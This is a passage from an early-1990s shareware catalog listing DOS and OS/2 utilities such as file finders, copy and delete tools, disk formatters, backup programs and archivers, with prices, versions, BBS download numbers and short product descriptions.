directories. + + Product: LK4.EXE + Needs: IBM PC, DOS 3.0 or better. + Author: GTX Software, 213-257-2704 + Registration: $10.00 + Registration benefits: Free upgrades for one year. + Version: 2.0 (10-20-91) + User benefits: Free upgrades for one year. + Look for: LK4.ZIP on BBSs (call 414-789-4352 to download it at no + charge); LK4.ZIP in IBMSYS forum LIB 6 on CompuServe. + Download size: 33k + Description: + A fast file finder that searches across all hard drives or + selected drives. User enters a string and it will search all + hard drives for filenames containing the string. If LK4 is + entered without a search string, it will search hard drives for + duplicate filenames. When it completes the search, all located + files are displayed in a window and the user may view, tag, or + delete selected files. Users may also automatically change to + the directory containing the selected file. + + Product: LOGIK MENU + Menu System, 43/50 lines, Mouse, Events, Log. See full + description on page 103. + + Product: LoveDOS + The computer falls in love with you. See full description on + page 390. + + Chapter 2, "Utilities" 18 + + + + Product: Mass-Store Copy + Copy disks with only one drive. (Opticals!). See full + description on page 31. + + Product: OffLoad + File archiving system. See full description on page 34. + + Product: An Ounce Of Prevention + Disaster-prevention/data-protection system. See full + description on page 115. + + Product: PALERT + Verify enough disk freespace before using pgm. See full + description on page 70. + + Product: PCOPY + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Registration benefits: Update of current version and future + enhancements. $45 purchases 8 utilities with bound manual. + Money back gurantee. + Version: 9.0D (04-01-91) + User benefits: Update of current version and future enhancements. + $45 purchases 8 utilities with bound manual. Money back + gurantee. + Look for: PCOPY90D.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PCOPY9.ZIP in IBMSYS forum LIB 6 on CompuServe; + PCOPY90D.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 105k + Description: + Offers the COPY utility DOS should have provided. Even with + DOS 5.0, DOS COPY can be dangerous to use and has limited + options. PCOPY's abundant options include: Multiple output + disks, fill disks efficiently, split files across disks, select + files by date/time/size, update/merge dirs and more. Special + *DISK*.* type wildcards. Scan/Make directories, prevent + accidental file overlays. Menu or command driven. Featured in + PC Computing July 1991 - Taming your Hard Disk by Preston + Gralla. + + Chapter 2, "Utilities" 19 + + + + Product: PDEL + Needs: IBM PC, DOS 3.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Registration benefits: Latest version, BBS Access and Updates. + $45 gets package of 8 utilities with bound manual. Money Back + Gurantee. Money Back Gurantee. + Version: 4.2 (12-26-90) + User benefits: Latest version, BBS Access and Updates. $45 gets + package of 8 utilities with bound manual. Money Back Gurantee. + Money Back Gurantee. + Look for: PDEL42.ZIP on BBSs (call 714-352-2825 to download it at + no charge); PDEL42.ZIP in IBMSYS forum LIB 6 on CompuServe; + PDEL42.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 62k + Description: + Offers the file delete utility that DOS should have provided. + Extensive file selection capabilities let you delete just what + you want. Select by date/time, size, attribute, special + wildcard patterns like *DISK*.* and mode. Delete until a + specified amount of freespace exists. Wipe file data before + deleting to prevent file undelete. Test feature simulates + delete. Emergency stop by pressing any key. Recommended in PC + Computing July 1991 - Taming your Hard Disk by Preston Gralla. + + Product: Professional Master Key + Needs: IBM PC, DOS 2.0 or better. Hard disk (except large IDE + drives) - Not for Digital Research's DR DOS. + Author: Public Brand Software, 317-856-7535 + Registration: $35.00 + Registration benefits: BBS, phone, and mail support - disk with + latest version - printed manual - notice of upgrades. + Version: 3.2 (04-10-91) + User benefits: BBS, phone, and mail support - disk with latest + version - printed manual - notice of upgrades. + Look for: PMK32.ZIP on BBSs (call 317-856-2087 to download it at + no charge); PMK32.ZIP in IBMHW forum LIB 1 on CompuServe. + Download size: 205k + Description: + ALTER read-only, system, hidden attributes + EDIT files and sectors directly (hex editor) + EXPLORE disk configuration, statistics, etc. + FILL files and disks with patterns to prevent + unerasure (DOD compliant) + LOCATE files in subdirectories ("WHEREIS") + MAP disk and file usage - detect fragmentation + SET file date and time ("TOUCH") + SORT and move directory entries on the disk + UNERASE files - very easy to use + UNFORMAT most hard disks + + Chapter 2, "Utilities" 20 + + + + Product: PSEARCH + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Registration benefits: Latest version, BBS access and updates. + $45 gets 8 utility package with bound manual. Money Back + gurantee. + Version: 4.4e (04-10-91) + User benefits: Latest version, BBS access and updates. $45 gets + 8 utility package with bound manual. Money Back gurantee. + Look for: PS44E.ZIP on BBSs (call 714-352-2820 to download it at + no charge); PS44E.ZIP in IBMSYS forum LIB 6 on CompuServe; + PS44E.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 85k + Description: + Used by thousands of users to locate files on hard disks. You + provide it with words or phrases, and it will scan a directory, + directory tree, or all directories to find any file containing + the text. Extensive file selection and pattern matching are + provided. Not only finds files but provides colorful display + of found text. Can also drive other commands for found files. + A must have utility. Recommended in PC World as one of the + Best of Shareware products in 1990 (October 1990). + + Product: PTOUCH + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $10.00 + Registration benefits: Current version and updates. $45 gets + package of all 8 utilities. + Version: 2.0 (08-18-90) + User benefits: Current version and updates. $45 gets package of + all 8 utilities. + Look for: PTOUCH2.ZIP on BBSs (call 714-352-2825 to download it + at no charge). + Download size: 15k + Description: + Lets you modify the date and time DOS keeps in file directories + for each file. You may either set them to the current date/ + time or to any specific value you desire. Useful for + correcting date/time when the system clock was improperly set. + Can also be used to set a group of files to the same date/time + value. This helps associate them as a synchronized group. Part + of the Patriquin Utilities. + + Product: PullDown SAA Menu Shell + SAA CUA Compliant Dialog Boxed Menu System. See full + description on page 105. + + Chapter 2, "Utilities" 21 + + + + Product: Renamer + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.01 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: RENDD101.ZIP on BBSs; RENDD1.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 13k + Description: + Renames directories, quick & easy. Eliminates need to create a + new directory, copy files from old directory, delete the old + files, then delete the old directory. Works even on full + disks. + + Product: Renamer/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.01 (07-07-91) + User benefits: Eligibility for free upgrades. + Look for: RENDO101.ZIP on BBSs; REND01.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 14k + Description: + Renames directories, quick & easy from the command line. + Eliminates need to create new directory, copy files from old + directory, delete old files, then delete the old directory. + + Product: SLIM + Transparent File Compression System. See full description on + page 36. + + Product: SST: the Supersonic Search Tool + Needs: IBM PC, DOS 2.1 or better. + Author: Keith Ledbetter, 804-674-0780 + Registration: $15.00 + Registration benefits: Registered users receive a BRAND utility + to embed their name into all future versions and free voice + support. + Version: 5.2b (05-12-91) + User benefits: Registered users receive a BRAND utility to embed + their name into all future versions and free voice support. + Look for: SST_52B.ZIP on BBSs (call 804-790-1675 to download it + at no charge); SST52B.ZIP in IBMSYS forum LIB 6 on CompuServe; + SST_52B.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 50k + Description: + The "grand-daddy" of all file-finders, this program has been + around since 1988 (previously named simply "WhereIs") and is + regularly being upgraded to keep up with the times (and ahead + of the competition). SST supports searching within all major + + Chapter 2, "Utilities" 22 + + + + archive formats, regular-expression ("grep") searching on both + filename and 4DOS descriptions, size ranges, date ranges, + verified deletion, duplicate file searching, command execution + on found files, and too many other features to list. Network + compatible. + + Product: TreeTop + Hard Disk File and Directory Manager. See full description on + page 111. + + Product: XDIR + Needs: IBM PC, DOS 2.0 or better. + Author: XD Systems, 703-821-3215 + Registration: $25.00 + Registration benefits: Disk and printed manual; telephone and CIS + support; utilities for registered users automate inclusion of + comments in ZIP files (XDZIP/ZDUNZIP), and keep track of the + number of times your files are accessed and the day of last + use(XDCOUNT/XDUPDATE). + Version: 3.05 (03-09-91) + User benefits: Disk and printed manual; telephone and CIS + support; utilities for registered users automate inclusion of + comments in ZIP files (XDZIP/ZDUNZIP), and keep track of the + number of times your files are accessed and the day of last + use(XDCOUNT/XDUPDATE). + Look for: availability unknown on BBSs; XDIR30.ZIP in IBMSYS + forum LIB 1 on CompuServe. + Download size: 58k + Description: + A commented directory utility that replaces the DOS DIR + command. You can attach a descriptive comment of up to 65 + characters to each file. The comment will appear in the + directory display. Makes sure that comments will stay with + your files when you COPY, RENAME or MOVE them. Can RUN + programs from the directory list and supports executable + extensions, automatically recognizing the appropriate + application to launch for each selected file. + + Chapter 2, "Utilities" 23 + + + + 2.1.3 Floppy disk utilities + + Product: Disk DUP + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $25.00 + Registration benefits: Printed manual, master disks, unlimited + technical support, product discounts. + Version: 5.9a (11-08-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: DUP59A.EXE on BBSs; DUP59.EXE in IBMHW forum LIB 1 on + CompuServe. + Download size: 75k + Description: + Speeds the duplication of disks. Master images are stored on + hard drive, but data compression saves valuable space. Copies + can be produced at lightning speed. Multi-disk option for up to + ten drives at once! Disks can be serialized at your option. + Many options, excellent user interface, full status screen. + Very powerful, yet easy to use! If you need to make multiple + copies of disks, DUP will make it quick and easy. + + Product: Disk Manager (CUDM) + Disk Catalog system. See full description on page 9. + + Product: DISKLIST [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Gulf Sierra, 301-460-0354 + Registration: $25.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Version: 2.50 (04-21-92) + User benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: DISKLI25.ZIP on BBSs (call 202-547-2008 to download it + at no charge); DSKL25.ZIP in IBMSYS forum LIB 9 on CompuServe. + Download size: 149k + Description: + Produces diskette lists & labels with the directory contents + for 5.25", 3.5", and hard disks in 39 formats. Reads all sub- + dirs. Prints different or duplicate lists on every label on + Avery Laser label sheets. Prints on disk sleeves with PCL5. + Font downloading. Optionally displays file names in ZIP, ARC, + PAK, ZOO, and LHZ. DISKFLAP holds non- sticky list to 3.5" + disks. Configure layout of top of list. Prints on all printers, + video screen or a file. Small paper cutter available. + + Product: DiZk4D + st + The 1 DiZk Catalog & Label System For 4DOS. See full + description on page 10. + + Chapter 2, "Utilities" 24 + + + + Product: DJ-SLEEVE + Print storage sleeves for floppies on Deskjet. See full + description on page 51. + + Product: Dupes + Finds duplicate/empty files & empty dirs. See full description + on page 26. + + Product: Easy Format + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $35.00 + Registration benefits: Bound printed manual, Bonus Disk Set, free + technical support, 60 day money back guarantee, free CompuServe + Introductory Membership, and discounts on other products and + publications. + Version: 3.20 (11-30-90) + User benefits: Bound printed manual, Bonus Disk Set, free + technical support, 60 day money back guarantee, free CompuServe + Introductory Membership, and discounts on other products and + publications. + Look for: EZF32*.ZIP (multiple files) on BBSs; EZF32*.ZIP in + IBMHW forum LIB 1 (multiple files) on CompuServe. + Download size: 308k + Description: + Gives you complete control over every detail of the format + process - four disk testing levels, six bad spot marking + options, volume labels, custom boot messages, and more. Four + programs including a DESQview-specific version for formating in + the background under DESQview. Three languages - English, + German and Spanish. Fully customizable. + + Comments from reviews: "The Most Versatile Disk Formatter in + the World!" "On a scale of 1 to 10, the Easy Format package + rates at least an 11!" + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 14. + + Product: FBNCAT + Disk Catalog Manager. See full description on page 10. + + Chapter 2, "Utilities" 25 + + + + Product: FormGen Utility Pak #1 + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $25.00 + Registration benefits: Printed manual, master disks, unlimited + technical support, product discounts. + Version: 1.01 (10-30-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: UPAK1.EXE on BBSs; UPAK.EXE in IBMSYS forum LIB 3 on + CompuServe. + Download size: 146k + Description: + 12 excellent utilities! + QCOPY fast single drive copy, makes multiple copies, + no swapping + SERA secure file erase *** MEETS DOD STANDARDS *** + DUMP high performance hex dump + ENCRYPT/DECRYPT + fast and very secure file encryption + FEED/EJECT TSR page eject + GDAY your morning smile + SEARCH/GLOBAL + multifile search/replacement + LOCASE converts files to lower case + ZIPPROC automated file processing + TIMESYNC sets your system clock to time standard + + Product: Lite Format + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $14.95 + Registration benefits: Current version on disk, Bonus Disk, free + technical support, 60 money back guarantee, Free CompuServe + Introductory Membership, Discounts on other products and + publications. + Version: 1.20 (03-15-91) + User benefits: Current version on disk, Bonus Disk, free + technical support, 60 money back guarantee, Free CompuServe + Introductory Membership, Discounts on other products and + publications. + Look for: LTFORMAT.ZIP on BBSs; LTFRMT.ZIP in IBMHW forum LIB 1 + on CompuServe. + Download size: 80k + Description: + A subset of the larger Easy Format package. Two small, fast + programs (written in assembly language) to format floppy + diskettes. Includes a DESQview-specific program for formatting + in the background under DESQview. The DESQview version + requires less than 18K bytes of memory for its small DESQview + window. Both programs handle all common diskette/drive + combinations. Marks bad spots like the standard DOS format + program. Includes a quick option to wipe a disk clean without + checking for bad spots. + + Chapter 2, "Utilities" 26 + + + + Product: MAXI Form + Needs: IBM PC, DOS 3.2 or better. 360k/720k/1.2meg/1.44meg + floppy drive. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $10.00 + Registration benefits: Technical support plus upgrades for 60 + days. + Version: 1.7 (02-14-92) + User benefits: Technical support plus upgrades for 60 days. + Look for: availability unknown on BBSs; MAXI*.ZIP in IBMHW forum + LIB 1 on CompuServe; MAXI*.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 71k + Description: + A floppy disk formatting program that gives more space on a + disk: 360k disks are expanded to 420k, 720 becomes 800k, 1.2 + meg becomes 1.4 meg and 1.44 meg is boosted to 1.6 meg. The + disks are user transparent to DOS version 3.20 or later and can + be used interchangeably with normal DOS disks. + + Product: OMNIDiZk + DiZk Cataloging And Labeling System. See full description on + page 10. + + Product: PDEL + Safe/Precise DOS delete. Extensive features. See full + description on page 18. + + Product: PS-SLEEVE + PostScript floppy storage sleeve printer. See full description + on page 62. + + Product: SLIM + Transparent File Compression System. See full description on + page 36. + + + 2.2 File utilities + + Product: 4FILES + File manager & annotator for 4DOS & NDOS. See full description + on page 108. + + Product: Changer/2 + Changes files without word a processor. See full description + on page 300. + + Product: dBF-View + DBF File viewer plus other usefull Utilities. See full + description on page 166. + + Chapter 2, "Utilities" 27 + + + + Product: Dupes + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 3.10 (01-11-92) + User benefits: Eligibility for free upgrades. + Look for: DUPED310.EXE on BBSs; DUPE31.EXE in IBMSYS forum LIB 6 + on CompuServe. + Download size: 29k + Description: + Lets you recover wasted disk space by finding duplicate files, + empty files & empty directories. Options to check multiple + drives or multiple diskettes, to restrict checks to certain + directories, to exempt one or more directories from checking, + to delete duplicates as they're found, & consider files + duplicates only if size & date/time stamps match. Supports + international date/time/number formats. + + Product: FileFinder + Needs: IBM PC, DOS 2.1 or better. Optionally uses LIST, QEDIT, + Shez, and word processor. + Author: California Software Design + Registration: $25.00 + Registration benefits: Unlimited BBS/CompuServe/GEnie/mail + support. + Version: 3.8 (04-01-92) + User benefits: Unlimited BBS/CompuServe/GEnie/mail support. + Look for: FFF38.ZIP on BBSs (call 707-528-2261 to download it at + no charge); FFF38.ZIP in IBMSYS forum LIB 6 on CompuServe; + FFF38.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 103k + Description: + Helps you find files on any hard disk attached to your PC, + including network attached drives. Numerous search options are + available, including the ability to search for files using an + expanded wild card specification. I.E. *PRO* will find all + files that have the letters PRO anywhere in the file name. A + command line version and a full screen version are both + included. The full screen version will, search for duplicate + files, allow you to launch programs, plus much more. + + Product: Filer! + Visual File Management for Ventura Publisher. See full + description on page 136. + + Product: FOURU + Four Handy Utilities. See full description on page 7. + + Product: JDIR + 4 Across Alphabetical Directory List. See full description on + page 16. + + Chapter 2, "Utilities" 28 + + + + Product: LK4.EXE + File Finder. See full description on page 17. + + Product: Mover + Moves file between directories & disks. See full description + on page 8. + + Product: PATTR + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $15.00 + Registration benefits: Newest version and future updates. + Version: 1.5 (12-26-90) + User benefits: Newest version and future updates. + Look for: PATTR15.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PATTR.ARC in IBMSYS forum LIB 1 on CompuServe. + Download size: 25k + Description: + Sets DOS attributes for one or more files. Can process one or + more directories with a single command and advanced file + selection capabilities are provided. It is commonly used to + set or reset the DOS archive flag to cause or prevent files + from becing processed by your favorite backup utility. Part of + the Patriquin Utilities. + + Product: PrintPlus + File and printer utility. See full description on page 46. + + Product: TextCon + Smart ASCII carriage return removal, cleanup. See full + description on page 141. + + 2.2.1 Backup/restore + + Product: Backup + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $10.00 + Registration benefits: Eligibility for free upgrades. + Version: 2.05 (06-16-91) + User benefits: Eligibility for free upgrades. + Look for: BACKD205.ZIP on BBSs; BACKD2.ZIP in IBMSYS forum LIB 6 + on CompuServe. + Download size: 23k + Description: + Fast, intelligent file backups. Copies files which don't exist + on the target drive, or whose date-time stamps are more recent + than target files. Options to clear archive bits, check volume + labels & backup from multiple directories. + + Chapter 2, "Utilities" 29 + + + + Product: Backup/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $10.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.01 (07-07-91) + User benefits: Eligibility for free upgrades. + Look for: BACKO101.ZIP on BBSs; BACK01.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 22k + Description: + Fast, intelligent file backups. Copies only files which don't + exist on target drive, or whose date-time stamps are more + recent than target files. Options to clear archive bit, check + volume labels & backup from multiple directories. + + Product: BakupWiz + Needs: IBM PC, DOS 2.1 or better. 512k RAM, hard disk, floppy + drive. + Author: PCX, 619-259-9797 + Registration: $59.00 + Registration benefits: Printed manual/disk; unlimited phone/FAX/ + BBS support; BETA tester eligibility; notification on upcoming + updates. + Version: 3.29fl (01-03-92) + User benefits: Printed manual/disk; unlimited phone/FAX/BBS + support; BETA tester eligibility; notification on upcoming + updates. + Look for: BWIZ.ZIP on BBSs (call 619-481-6479 to download it at + no charge); BWIZ.ZIP in IBMSYS forum LIB 6 on CompuServe. + Download size: 144k + Description: + Quick & reliable: speeds greater than 2 megabytes per minute. + Flexible: back up all files, any files you select, or any + changed files. Network support: NetWare 286 and 386 including + Apple File Protocol are supported. Directory and file access + privileges and binderies are backed up while users are still + logged onto the system. Secure: uses a password system to + shield your data. Easy to use: pull-down menus, helplines, and + message windows. + + Chapter 2, "Utilities" 30 + + + + Product: DirBack + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $35.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 3.6 (01-21-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: DIRBACK.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 140k + Description: + Makes daily disk backups a breeze. A few minutes a day keeps + your backups ready to restore your hard drive on a moments + notice. You only need to update the disks you know have + changed. You put the floppy in a drive and select pdate. + Even complex directory structures are handled automatically. It + never writes an older file on top of a newer version and only + spends time copying files that are new or have changed. Also + checks system file integrity at startup, and more. + + Product: Director + Displays & records disk directory structure. See full + description on page 12. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 14. + + Product: FLEXIBAK Plus + Needs: IBM PC, DOS 2.1 or better. Hard Disk. + Author: Nildram Software, 708-397-1221 + Registration: $59.00 + Registration benefits: Printed manual, master disks, lifetime + phone/mail/BBS/CompuServe support, inexpensive upgrades. + Version: 2.01 (03-11-92) + User benefits: Printed manual, master disks, lifetime phone/mail/ + BBS/CompuServe support, inexpensive upgrades. + Look for: FLEXP201.ZIP on BBSs (call 215-623-6203 to download it + at no charge); FP201.ZIP in IBMSYS forum LIB 6 on CompuServe. + Download size: 160k + Description: + The Ultimate Hard Disk Backup System For PCs Today. Features + include a unique filing method that gives far better file + management capabilities than other backup systems. This also + means that you only ever have to take a full backup once! + Includes inbuilt file compression, selective backups, support + for multiple hard disks (up to 20), and a handy backup reminder + alarm system. Unique among hard disk backup systems because it + looks after you. + + Chapter 2, "Utilities" 31 + + + + Product: LambChop + Needs: IBM PC, DOS 2.0 or better. 128k RAM, hard disk, floppy + drive. + Author: LambWare, 813-525-3162 + Registration: $30.00 + Registration benefits: Master disks, 90 days support. + Version: 1.02 (01-21-92) + User benefits: Master disks, 90 days support. + Look for: LAMBCHOP.ZIP on BBSs; LAMCHP.EXE in IBMSYS forum LIB 6 + on CompuServe. + Download size: 175k + Description: + Absolutely the finest file chopping system available. If you + need to move big files from one machine to another with methods + much slicker than what's available, LambChop is for you. + Features: FASTer than xcopy, compression, error checking, drop + to DOS between disks, operates from the DOS command line or a + pull down menu system, directly access files when UnChopping, + restores file attributes and time, available memory is your + only limit! + + Product: Mass-Store Copy + Needs: IBM PC, DOS 3.1 or better. Hard disk; one removable disk + drive. + Author: Informative Technologies, 202-675-4528 + Registration: $59.00 + Registration benefits: Printed Manual with disk; one year of + Phone/FAX/mail/Email/BBS support;Certificate for $7 off a + subscription to Shareware Magazine; free CompuServe Membership. + Version: 2.6 (04-01-91) + User benefits: Printed Manual with disk; one year of Phone/FAX/ + mail/Email/BBS support;Certificate for $7 off a subscription to + Shareware Magazine; free CompuServe Membership. + Look for: MSCOPY??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); MSC??.ZIP in IBMHW forum LIB 1 on CompuServe. + Download size: 145k + Description: + "Make copies of optical disks while using only one optical + drive!" Make backup copies of: + * Bernoulli Box disks + * Erasable Optical + * "Super Floppies" + * WORM Disks + * Removable/Portable hard drives + Backup copies of disks can be made while using only one + removable disk drive (No need to buy a second drive.). Copies + any size removable DOS disk, regardless of the available hard + disk space. Files larger than your hard drive can be copied. + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 104. + + Chapter 2, "Utilities" 32 + + + + Product: PAK + Archiver, reads and writes PAK, ARC, ZIP. See full description + on page 35. + + Product: PCOPY + COPY/MOVE files with all popular options. See full description + on page 18. + + Product: Point & Shoot Backup/Restore + Needs: IBM PC, DOS 2.0 or better. Hard disk, 320k RAM. + Author: Applied Micro Systems Technology, 405-377-0444 + Registration: $35.00 + Registration benefits: Disk with latest version, manual, free + support and update notices. + Version: 2.1 (10-01-90) + User benefits: Disk with latest version, manual, free support and + update notices. + Look for: availability unknown on BBSs; PASBR2.ZIP in IBMSYS + forum LIB 6 on CompuServe. + Download size: 90k + Description: + Backup up to 1MB per minute! Provides safe, quick backups of + hard disk files to floppy disks, and efficient restoration of + backup disks to hard disk. Features include automatic disk + formatting, extensive error checking, up to 10 user-defined + backup configurations, multiple subdirectory definitions with + or without trailing directories, optional disk formatting, file + compression, and pattern matched file searches. Restore to + another drive or directory and select individual files. + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 168. + + Product: Stamper + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.11 (01-01-92) + User benefits: Eligibility for free upgrades. + Look for: STAMD111.EXE on BBSs. + Download size: 10k + Description: + Changes file date/time stamps. Great for programmers who want + to manipulate MAKE programs. Also useful when using hard disk + backup programs that use file date/time stamps. + + 2.2.2 Encryption & security + + See also: Utilities, Security programs (page 115). + + Chapter 2, "Utilities" 33 + + + + Product: Attribution + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.12 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: ATTRD112.ZIP on BBSs; ATTRD1.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 16k + Description: + Changes or displays file or directory attributes (hidden, + system, read only & archive). Protects software & data from + accidental (or malicious) modification or deletion. Can also + hide sensitive directories & files. + + Product: Except + Temporarily protect files. See full description on page 78. + + Product: FILE PATCH + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $14.95 + Registration benefits: Printed manual, phone support. + Version: 2.0 (07-01-89) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; FILEPA.ZIP in IBMSYS + forum LIB 6 on CompuServe; FILEPATC.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 90k + Description: + An excellent file manipulation program providing the ability at + the byte level, and in ASCII or HEX, for on screen viewing, + dumping to the printer, modifying, creating, or extracting all + or portions of any file up to 10 megabytes in size. Easy to use + and powerful. A must for programmers, Information Centers, PC + consultants, etc. + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 117. + + Product: FormGen Utility Pak #1 + Super useful DOS utility kit. See full description on page 24. + + Product: Instant Access Menu System [***] + Easy, colorful interface for running programs. See full + description on page 103. + + Product: An Ounce Of Prevention + Disaster-prevention/data-protection system. See full + description on page 115. + + Chapter 2, "Utilities" 34 + + + + Product: Professional Master Key + Unerase, hex editor, unformat, disk map, etc. See full + description on page 19. + + Product: Shredder/2 + Securely erases files. See full description on page 116. + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 168. + + Product: Utility_Belt + .BAT file enhancements. See full description on page 73. + + 2.2.3 File archivers + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 121. + + Product: Directory Freedom + Compact file manager and application launcher. See full + description on page 7. + + Product: FLEXIBAK Plus + Flexible Hard Disk Backup System. See full description on + page 30. + + Product: LambChop + Chop & Unchop files across multiple drives. See full + description on page 30. + + Product: OffLoad + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk, one + floppy drive. + Author: FBN Software, 408-446-9039 + Registration: $49.95 + Registration benefits: Printed manual and latest version on disk, + pre-printed labels for your archive disks, beta test new + versions. + Version: 1.1 (03-01-91) + User benefits: Printed manual and latest version on disk, pre- + printed labels for your archive disks, beta test new versions. + Look for: OFLOD*.EXE (multiple files) on BBSs; OFLOD*.EXE in + IBMSYS forum LIB 6 (multiple files) on CompuServe. + Download size: 370k + Description: + Offload is a new concept. It is not a general purpose archive + such as PKZIP. OffLoad and its associated utilities allow you + to identify files that really do not need to be on your hard + disk, compress them and move them off to floppies. It maintains + a catalog to allow you to track and restore any file from the + archive automatically. Think of it as file manager, archiver, + + Chapter 2, "Utilities" 35 + + + + and disk cataloger all in one. It will let you free up hard + disk space and maintain control of your files. + + Product: PAK + Needs: IBM PC, DOS 2.0 or better. + Author: NoGate Consulting, 616-530-9950 + Registration: $15.00 + Registration benefits: Free BBS and phone support, mailed notice + of new versions. + Version: 2.51 (10-08-90) + User benefits: Free BBS and phone support, mailed notice of new + versions. + Look for: PAK251.EXE on BBSs (call 616-530-3392 to download it at + no charge); PAK251.EXE in IBMNEW forum LIB 2 on CompuServe; + PAK251.EXE in IBMPC RTC LIB 5 on GEnie. + Download size: 100k + Description: + * Reads and writes PAK, ARC, and ZIP files + * Easily convert from any format to any other + * Create royalty-free self-extracting archives + * Full path support in self-extracting archives + * Fast updates via the NoGate BBS + * Unlimited comment size + * File sorting by name, date, extension, or length + * Extremely flexible interface - customize to suit your + needs + * Windowed full-screen edition available + * Programmer's toolkit adds compression to your programs + + Product: PMZIP [***] + Needs: IBM AT (80286), OS/2 1.0 or better. PKZIP/PKUNZIP. + Author: Nico Mak + Registration: $29.00 + Registration benefits: Master disks, CompuServe/BIX/mail support. + Shareware disks of other programs. + Version: 1.00 (01-14-91) + User benefits: Master disks, CompuServe/BIX/mail support. + Shareware disks of other programs. + Look for: availability unknown on BBSs; PMZIP.ZIP in IBMOS2 forum + LIB 1 on CompuServe. + Download size: 70k + Description: + An OS/2 Presentation Manager ZIP shell featuring + v/ Point and click SAA/CUA compliant interface for adding, + deleting, extracting, and viewing members of a ZIP file + v/ Multi-selection list box with the names, sizes, and date/ + time stamps of files in a ZIP file (double-click on a file + to view it) + v/ Extensive online hypertext help/documentation + v/ Easy installation + v/ All options can be saved and restored + v/ Support for File Manager Drag and Drop interface + + Chapter 2, "Utilities" 36 + + + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 110. + + Product: Shez + Needs: IBM PC, DOS 2.1 or better. LIST program and one or more + compression programs: PKZIP, LHA, ARJ, ZOO, or PAK. + Author: California Software Design + Registration: $39.00 + Registration benefits: Master disks, unlimited BBS/CompuServe/ + GEnie/mail support. + Version: 7.0 (03-30-92) + User benefits: Master disks, unlimited BBS/CompuServe/GEnie/mail + support. + Look for: SHEZ70.ZIP on BBSs (call 707-538-8710 to download it at + no charge); SHEZ70.ZIP in IBMSYS forum LIB 6 on CompuServe; + SHEZ70.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 189k + Description: + A program shell designed to make working with compressed files + a much eaiser task. Can handle ZIP, ARC, ZOO, LZH, PAK, AND + ARJ compressed files. The user can use drop down menus to + manage their compressed files, or built in hotkeys can be used + for the more advanced user. Provides built-in context + sensitive help for all functions, and provides a common + interface to all of the supported compressed file formats. You + can view, create, modify, convert, virus-check, and much more. + + Product: SLIM + Needs: IBM PC, DOS 2.0 or better. + Author: Dominic Herity + Registration: 